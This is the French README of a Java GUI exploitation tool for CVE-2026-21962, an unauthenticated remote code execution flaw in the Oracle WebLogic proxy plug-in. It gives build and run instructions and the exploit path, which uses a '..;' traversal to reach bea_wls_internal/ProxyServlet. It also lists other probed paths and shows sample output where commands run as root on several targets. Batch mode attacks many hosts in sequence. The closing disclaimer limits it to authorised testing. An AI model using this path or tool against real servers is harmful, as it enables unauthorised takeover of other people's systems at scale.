
Outil Java avec interface graphique pour exploiter CVE-2026-21962, une RCE non authentifiée dans le plug-in proxy Oracle WebLogic, permettant l'exécution de commandes multi-cibles via HTTP.
Version Java GUI de l'outil d'exploitation de la vulnérabilité RCE (Exécution de Code à Distance) du Proxy Plug-In Oracle WebLogic Server.
java-version/
├── pom.xml # Fichier de configuration du projet Maven
├── README.md # Documentation du projet
├── run.bat # Script de démarrage Windows
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # Point d'entrée du programme
├── core/
│ └── Exploit.java # Logique principale d'exploitation
├── gui/
│ └── MainWindow.java # Fenêtre principale de l'interface graphique
└── util/
└── HttpClient.java # Outil de requêtes HTTP
La fenêtre du programme comprend les zones suivantes :
Zone des paramètres d'entrée (en haut)
Zone des boutons (au milieu)
Zone des journaux d'exécution (en bas à gauche)
Zone de sortie des commandes (en bas à droite)
cd java-version
mvn clean compile
mvn clean package
Le fichier JAR empaqueté se trouve dans : target/cve-2026-21962-1.0.0.jar
Double-cliquez sur le fichier run.bat pour démarrer le programme
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[chemin des dépendances jar]" com.ashwesker.cve202621962.Main
URL cible :
http://192.168.1.100:7001
Commande à exécuter :
whoami
URL cible :
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
Commande à exécuter :
id
Exemple de résultat de sortie :
[*] Début du test de la vulnérabilité...
[*] URL cible : http://192.168.1.100:7001
[*] Commande exécutée : id
[*] Chemin de test : http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Succès ! Code de statut : 200
[+] Exécution de la commande réussie !
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] Début du test de la vulnérabilité...
[*] URL cible : http://192.168.1.101:7001
[*] Commande exécutée : id
[*] Chemin de test : http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] Succès ! Code de statut : 200
[+] Exécution de la commande réussie !
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
Après le démarrage du programme, saisissez l'adresse du serveur cible dans le champ de texte « URL cible »
http://target:7001 ou https://oracle-server:4443Saisissez la commande à exécuter dans le champ « Commande à exécuter »
whoami, id, powershell -c ..., etc.Cliquez sur le bouton « Exécuter l'exploitation » pour démarrer le test
Consultez les « Journaux d'exécution » ci-dessous pour suivre le processus de test
Consultez la « Sortie des commandes » ci-dessous pour obtenir les résultats de l'exécution des commandes
Saisissez plusieurs adresses cibles dans le champ de texte « URL cible », une par ligne
http://target1:7001
http://target2:7001
https://target3:4443
Saisissez la commande à exécuter dans le champ « Commande à exécuter »
Cliquez sur le bouton « Exécuter l'exploitation » pour démarrer le test par lots
Le programme teste chaque cible successivement, les résultats de sortie des différentes cibles sont séparés par ================ (80 signes égaux)
Consultez les « Journaux d'exécution » ci-dessous pour suivre le processus de test de chaque cible
Consultez la « Sortie des commandes » ci-dessous pour obtenir les résultats d'exécution des commandes de toutes les cibles
Le programme teste automatiquement les chemins suivants :
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ Avertissement : cet outil est destiné uniquement aux tests de sécurité autorisés. L'utilisation non autorisée de cet outil pour attaquer des systèmes est illégale.
Main.java
Exploit.java
MainWindow.java
HttpClient.java
Ce projet est destiné uniquement à des fins éducatives et de recherche en sécurité.